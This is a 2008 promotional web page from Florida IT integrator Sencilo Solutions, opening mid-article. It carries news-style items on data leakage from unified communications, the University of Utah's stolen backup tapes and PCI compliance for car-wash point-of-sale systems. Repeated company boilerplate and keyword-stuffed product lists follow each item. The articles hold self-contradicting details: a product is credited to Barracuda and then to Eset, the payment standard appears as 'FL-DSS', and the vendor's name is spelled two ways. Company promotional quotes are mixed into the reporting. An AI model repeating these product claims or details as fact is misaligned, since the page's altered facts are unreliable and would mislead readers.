Armed with that business information, the CIO proceeded to purchase two locking steel file cabinets and hire two administrative assistants to manually track these customers. He arranged with the corporate records office to have copies of each customer record securely shipped to the corporate off-site archives for data protection and business continuity. The savings were between $1.5 and $2.5 million dollars. Bottom line: Look at the business aspects of what you are doing. Spending money on aggressive DR for all business processes may be wasting money.

For more information please call (407) 265-6293 or visit us at: http://www.sencilo.com/continuity-disaster.php

About Us

Sencilo Solutions is a Florida-based integrator specializing in storage and security solutions. Sencilo delivers a comprehensive portfolio of products from best-of-breed hardware and software from multiple manufacturers including VMware, EMC, Juniper Networks, Hitachi, Symantec, Barracuda Networks, and HP. Its technical expertise is known throughout the storage and security industry. Clients include leading corporations, major financial institutions, top universities, government facilities, as well as small to medium size businesses. Sencilo's professional services include consulting, integration, project management, installation, maintenance and knowledge transfer.

Sencilo has offices throughout Florida including: Jacksonville, Daytona Beach, Miami, Tampa, St. Petersburg, Orlando, Hialeah, St. Augustine, Gainesville, Ocala, Palm Coast, Clearwater, Kissimmee, Lakeland, Maitland and Cape Canaveral

Offerings Projects: Replication De-Dup De-Dupe iSCSI SAN NAS VMware Security EMC NetApp HP IBM Quantum Compliance VTL Data Domain vs Gartner Magic Quadrant Quadrent LTO Backup Exc Pure Disk NetBackup Networker TSM Commvault BakBone D2D D2D2T compare cloud data deduplication  thin provisioning DXi Global Compression DDX  virtual tape library Data Reduction SEPATON FALCON compare Celerra CLARiiON Equallogic Dell NS20 NS40 CX4 CX3-20 CX3-40 CX3-80 FAS2050 FAS3050 Xiotech Nexsan Avamar DLD3 1500 D3 Storwiz storage compression data Ocarina Networks A-SIS compare Sepaton infopro BlueArc OnStor Microsoft Unified Storage data protection StorageX Brocade FAQ

What Cisco isn't telling us about VoIP and data leakage - July 17, 2008

Orlando Florida -- Large software and infrastructure vendors have been pushing companies toward unified communications (UC), but many firms are viewing UC as another avenue for data leakage, according to a recent survey conducted by Black Diamond, Wash.-based Osterman Research Inc.

"Some firms are shopping for data leakage prevention tools as part of their unified communications projects. Many fear that sensitive company data could be difficult to control when email, Voice over Internet Protocol (VoIP) and instant messages meld with collaboration systems, multimedia services and transactional systems", says Brian McCarthy President and well-known Security Consultant for Sencilo solutions Lake Mary Florida. 

Nearly 50% of respondents are concerned about information leak prevention in their current or planned unified communications implementations, and 23% of those view leak prevention as a top priority, according to an online survey of 109 mid-to-large IT organizations in North America, conducted last month by Osterman Research.

"The major vendors are really pushing that UC message, and I think companies are starting to respond and understand that UC is a good thing, but it creates even more opportunities for data leaks," said Michael Osterman, president and principal analyst at Osterman Research.

The survey was commissioned by Belmont, Calif.-based messaging security vendor FaceTime Communications Inc.

IT pros fear a number of threats posed by melding communications onto one common data network. An attacker can intercept VoIP, instant messaging (IM) and other traffic, or worse, they can conduct a distributed denial-of-service (DDoS) attack by using a VoIP protocol to flood systems with session requests. Others fear an increase in vishing, the VoIP-enabled form of phishing.

But the risk of those forms of attack is minimal, Osterman said. Insider threats from unintentional or accidental leaks pose a greater threat, he said, and the survey suggests that IT organizations are heeding that message. Forty-eight percent of respondents view unintentional or accidental leaks of information by employees as a serious concern, as compared with 31% who named data loss due to malicious software as a serious concern.

Osterman said he's still seeing companies willing to accept the risks involved with UC rather than being proactive by implementing technologies or sound security policies. For example, a consultant couldn't convince a company to implement an email archiving system. The firm decided to pay fines instead.

Companies need to begin with the basics and develop a multi-layer defense strategy, Osterman said. Companies can implement portions of a data leakage prevention system by focusing on the data governing rules outlined by their industry. For example, a merchant can implement a system that monitors all outbound email and IM for 16-digit character strings.

"We're starting to find organizations that are at least thinking about the issues, but there are a lot of companies that don't realize the negative ramifications of what they're doing," he said.

For more information please call (407) 265-6293 or visit us at: http://www.sencilo.com/security-compliance-management.php
 
Sencilo Solutions is a Florida-based integrator specializing in network storage and information security solutions. Sencilo delivers a comprehensive portfolio of products from best-of-breed hardware and software from multiple manufacturers including VMware, EMC, RSA, Juniper Networks, Hitachi, Symantec, Barracuda Networks, and HP. Its technical expertise is known throughout the storage and security industry. Clients include leading corporations, major financial institutions, top universities, government facilities, as well as small to medium size businesses. Sencilo's professional services include consulting, integration, project management, installation, maintenance and knowledge transfer.
 

Sencilo has offices throughout Florida including: Jacksonville, Daytona Beach, St. Petersburg, Orlando, Hialeah, St. Augustine, Gainesville, Ocala, Palm Coast, Kissimmee, Lakeland, Maitland, Cape Canaveral, Lake Mary

Other products include Barracuda Networks Security RSA Encryption Cisco Decru Neoscale EMC NetApp Compliance vs. Gartner Magic Quadrant SSL SonicWall Secure Computing Firewall VPN Endpoint DLP Tumbleweed Ironmail Ironport Secure Computing compare data leakage enVision Data Loss Prevention Encryption and Key Management CA Symantec Juniper

University of Utah lost 2.2 million Health Care and Social Security Records - June 26, 2008

Courier violated protocol, taking data home instead of directly to off-site storage facility  

Orlando Florida -- University of Utah officials this week acknowledged that a metal box of backup tapes containing billing records of some 2.2 million patients was stolen early this month from the car of a courier who left it in a parked car overnight outside his home.

The missing tapes were taken on June 2 from the car of an employee of Perpetual Storage Inc., an independent storage company hired by the university to transport its computer tapes to off-site facilities, said school officials. The tapes contained names, demographic information and Social Security numbers of patients of the University of Utah Hospitals & Clinics.

The health care system has suspended all backup tape deliveries to Perpetual Storage pending a full review of the company's protocols and procedures, said a university spokeswoman.

The spokeswoman confirmed that Perpetual Storage fired the individual involved with the data breach for violating company data security transportation protocols. The driver had been employed by Perpetual Storage for 18 years, she said.

The spokeswoman said the driver informed his employer immediately upon discovering that the tapes were lost. Perpetual Storage informed the University of Utah Hospitals & Clinics officials within 24 hours of the breach, she added.

Perpetual Storage did not immediately return calls by Computerworld seeking comment.

The university spokeswoman declined to say whether any of the missing data storage tapes were encrypted.

Lorris Betz, senior vice president for health sciences and CEO of University of Utah Health & Clinics, said in a posted alert that it's unlikely that any information on the backup tapes will be exposed to thieves. "Although it is unlikely that information on the tapes will be compromised, we are nevertheless taking aggressive steps to protect our patients' confidentiality," Betz said in the post.  "Not true" says Brian McCarthy President of Sencilo Solutions and well known speak of backup and security, "if their tapes do not contain encryption any one with a tape drive can read the files."

The university plans to mail notification letters to all patients whose data was held on the stolen tapes and offer them free credit-monitoring services. The missing tapes did not hold any credit card information, noted school officials.

The university is offering a reward of $1,000 for the return of the stolen tapes with "no questions asked." The Salt Lake County Sheriff's Department, the FBI and U.S. Postal Service are investigating the theft.

For more information please call (407) 265-6293 or visit us at: http://www.sencilo.com/security-compliance-management.php
 

About Us
 

Sencilo Solutions is a Florida-based integrator specializing in storage, security and networking solutions. Sencilo delivers a comprehensive portfolio of products from best-of-breed hardware and software from multiple manufacturers including VMware, EMC, NetApp, Juniper Networks, Hitachi, Symantec, Barracuda Networks, and HP. Its technical expertise is known throughout the storage and security industry. Clients include leading corporations, major financial institutions, top universities, government facilities, as well as small to medium size businesses. Sencilo's professional services include consulting, integration, project management, installation, maintenance and knowledge transfer.
 

Sencilo has offices throughout Florida including: Jacksonville, Daytona Beach, St. Petersburg, Orlando, Hialeah, St. Augustine, Gainesville, Ocala, Palm Coast, Kissimmee, Lakeland, Maitland, Cape Canaveral, Lake Mary
Other products include Barracuda Networks Security RSA Encryption Cisco Decru Neoscale EMC NetApp Compliance vs. Gartner Magic Quadrant SSL SonicWall Secure Computing Firewall VPN Endpoint DLP Tumbleweed Ironmail Ironport Secure Computing compare data leakage enVision Data Loss Prevention Encryption and Key Management CA Symantec Juniper

 

Where will it end? PCI compliance now extends to POS car washes, quick lubes - June 17, 2008

When Innive Systems, Inc., began integrating credit card clearing into its point-of-sale systems for car washes by connecting to a credit card clearinghouse over the Internet, executives at the company knew they had to do something to protect the machines.

At first, they advised their customers to install antivirus software. But over time, it became clear the customers weren't heeding their advice: Support calls soared as machines became infected with viruses and other malware. The outbreaks would prevent the vendor's POS applications, which are integrated with the car wash tunnel operations, from running and disrupt business. Support technicians spent hours cleaning up customers' systems.

"It really led us to look at the fact that they weren't being proactive in protecting themselves so we had to look for a solution," said Joe Jennings, network administrator at Daytona Beach Florida-based Innive Systems.

The company began looking for software that would work with its application and provide affordable protection for its customers. Jennings and his team put seven antivirus products to the test on a POS system. They threw viruses and spyware at each, and looked at how fast they allowed the Innive Systems application to run.

"We went through the entire gambit with each one," Jennings said.

In the POS world, anything that slows down the ability to produce a receipt is unacceptable, he explained. "You don't want customers standing there waiting for anything." In that respect, Barracuda Antivirus, stood out from the others. With it, a receipt popped out in less than half a second. CA's antivirus caused the longest lag at 20 seconds, Jennings said.

Jennings and his team also liked Barracuda proactive capabilities in blocking malware, its integrated anti-spyware protection, Eset's automatic updates, and low price. The initial plan was to resell the antivirus protection to customers, but with the PCI Data Security Standard becoming a concern, the company's president decided that it needed to be included with every POS system, Jennings said.

By including the antivirus protection with its systems, Innive Systems is helping its customers at nearly 3,000 car wash and quick lube locations comply with the PCI standard, Jennings said. Barracuda, which is installed with the POS server in active scanning mode for real-time protection, prevents viruses, Trojans or other malware from reading or extracting any of the data flowing from the POS device and server to the credit card clearinghouse, he said. No credit card data is stored on the POS device or server, he added.

The need to secure POS systems was highlighted in the recent indictment of three men on charges of hacking into computer systems at 11 Dave & Buster's restaurants and stealing credit and debit card numbers. The trio allegedly gained unauthorized access to the POS servers at each restaurant and installed packet sniffers designed to capture credit card data.

Security expert Brian McCarthy of Sencilo Solutions in Longwood Florida have said "a common security problem at retail locations are POS systems that are managed by third parties via unsecured remote access systems that often use blank or default passwords."

In addition to providing antivirus protection with its POS solutions, Innive Systems ships to each customer a router that's configured securely, without any standard open ports. And even before PCI compliance became an issue, the company realized it needed to replace its remote support solution for managing client machines with a more secure system, Jennings said. It chose the Bomgar Box, which he described as a secure, encrypted point-to-point system; no standard passwords are used and Jennings requires frequent password changes for employees.

In addition, Innovive Systems is working to get its software validated under the new Payment Application Data Security Standard. FL-DSS is based largely on Visa's Payment Application Best Practices (PABP) program.

Since the vendor starting shipping every system with Barracuda, calls to its support team about viruses and other problems dropped tremendously, Jennings said. The company also replaced its Symantec and Webroot Software antivirus products with antivirus on its corporate network.

For more information please call (407) 265-6293 or visit us at: http://www.sencilo.com/security-compliance-management.php

About Us

Sencilo Solutions is a Florida-based integrator specializing in storage, security and networking solutions. Sencilo delivers a comprehensive portfolio of products from best-of-breed hardware and software from multiple manufacturers including VMware, EMC, NetApp, Juniper Networks, Hitachi, Symantec, Barracuda Networks, and HP. Its technical expertise is known throughout the storage and security industry. Clients include leading corporations, major financial institutions, top universities, government facilities, as well as small to medium size businesses. Sencilo's professional services include consulting, integration, project management, installation, maintenance and knowledge transfer.

Sencilo has offices throughout Florida including: Jacksonville, Daytona Beach, Miami, Tampa, St. Petersburg, Orlando, Hialeah, St. Augustine, Gainesville, Ocala, Palm Coast, Clearwater, Kissimmee, Lakeland, Maitland,     Cape Canaveral

Key words: Barracuda Networks Security RSA Encryption Cisco Decru Neoscale EMC NetApp Compliance vs. Gartner Magic Quadrant SSL SonicWall Secure Computing Firewall VPN Endpoint DLP Tumbleweed Ironmail Ironport Secure Computing compare data leakage enVision Data Loss Prevention Encryption and Key Management CA Symantec Juniper